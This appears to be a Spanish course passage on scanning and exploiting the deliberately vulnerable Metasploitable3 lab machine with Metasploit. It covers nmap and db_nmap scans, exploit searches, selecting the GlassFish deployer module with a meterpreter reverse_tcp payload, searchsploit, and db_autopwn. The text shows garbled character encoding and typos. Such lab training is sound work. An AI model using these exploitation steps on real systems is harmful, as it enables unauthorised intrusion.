El escaneo y detecci贸n de vulnerabilidades es el proceso de escanear un objetivo en busca de vulnerabilidades y verificar si pueden explotarse.
Hasta ahora, hemos podido identificar y explotar configuraciones err贸neas en los sistemas de destino; sin embargo, en esta secci贸n exploraremos el proceso de utilizaci贸n de m贸dulos auxiliares y de explotaci贸n para escanear e identificar vulnerabilidades inherentes en servicios, sistemas operativos y aplicaciones web.
Esta informaci贸n ser谩 煤til durante la fase de explotaci贸n de este curso.
Tambi茅n exploraremos el proceso de utilizaci贸n de herramientas de escaneo de vulnerabilidades de terceros como Nessus y c贸mo podemos integrar la funcionalidad de Nessus en MSF.
Lab Environment
Para demostrar el proceso de escaneo de vulnerabilidades, utilizaremos una m谩quina virtual intencionalmente vulnerable llamada Metasploitable3 que se basa en Windows Server 2008.
Metasploitable3 fue desarrollado por Rapid7 para demostrar c贸mo se puede utilizar MSF para realizar la explotaci贸n de un sistema Windows.
Las instrucciones sobre c贸mo se puede configurar esta m谩quina virtual se pueden encontrar aqu铆: https://bit.ly/3kASwns
Demo: Vulnerability Scanning With MSF
# Reconocimiento de red
sudo nmap -sn x.x.x.x/24
# Inicializamos los servicios de metasploit
service postgresql start
[ 0k ] Starting PostgreSQL 11 database server: main.
msfconsole
db_status
# Configuramos el espacio de trabajo [Workspace]
msf5 > workspace -a MS3
[ * ] Added workspace:
Workspace: MS3
# Configurar la IP de la victima/hacker en la variable general
msf5 > setg RHOSTS 192.140.160.3
RHOSTS 192.140.160.3
msf5 > setg RHOST 192.140.160.3
RHOST 192.140.160.3
# Realizamos un scaneo
db_nmap -sS -sV -O <Target>
######################### Resultados del Escaneo #############################
# Informacion de los Host escaneados
msf6 > hosts
# Servicios listados basados en el host segun el escaneo realizado
msf6 > services
##############################################################################
# Buscar una vulnerabilidad basado en la version
msf6 > search type:exploit name:Microsoft IIS <Version>
# En caso de que solo tengamos un modulo, ver si funciona el exploit en la version
# que queremos
msf6 > search Sun GlassFish
# Usamos el modulo y nos pedira configurar un payload
msf6 > use exploit/multi/http/glassfish_deployer
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
# Tambien puede ver informacion del payload donde nos indicara en que
# versiones o como funciona el exploit
msf6 exploit(multi/http/gtassfish_deployer) > info
# Configuracion del payload
msf6 exploit(multi/http/gtassfish_deployer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/gtassfish_deployer) > show options
# Tambien podemos buscar exploits que esten fuera y dentro del modulo del MSF
# utilizando una terminal
kaliakali:-$ searchsploit "Microsoft windows SMB"
# Solo filtraremos modulos que esten dentro del modulo de MSF
kaliakali:-$ searchsploit "Microsoft windows SMB" | grep -e "Metasploit"
# Identificado el exploit el mismo se utilizara y buscara en metasploit
# por lo caul se debera de utilizar con el comando use y buscar con search
Tambien podemos utilizar el proceso del DB AUTOCOMPLEMTO PLUGIN, en el siguiente enlase le indicara una breve descripcion del complemento de Metasploit para una facil explotacion y vulnerabilidad de ataque. Lo que significa es que se utiliza esencialmente para identificar m贸dulos de explotaci贸n para los puertos que est谩n actualmente abiertos en un sistema de destino.
Pasos antes de su utlizacion:
Descargar
Mover al directorio de /usr/share/metasploit-framework/plugins
Cargar a metasploit
msf6 > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf6 > db_autopwn
msf6 > db_autopwn -p -t -PI 445
Tambien se puede utilizar el comando Analyze, el cual analizara el contenido de la base de datos de metasploit, entonces sus hosts y servicios y luego le proporcionara una lista de vulnerabilidades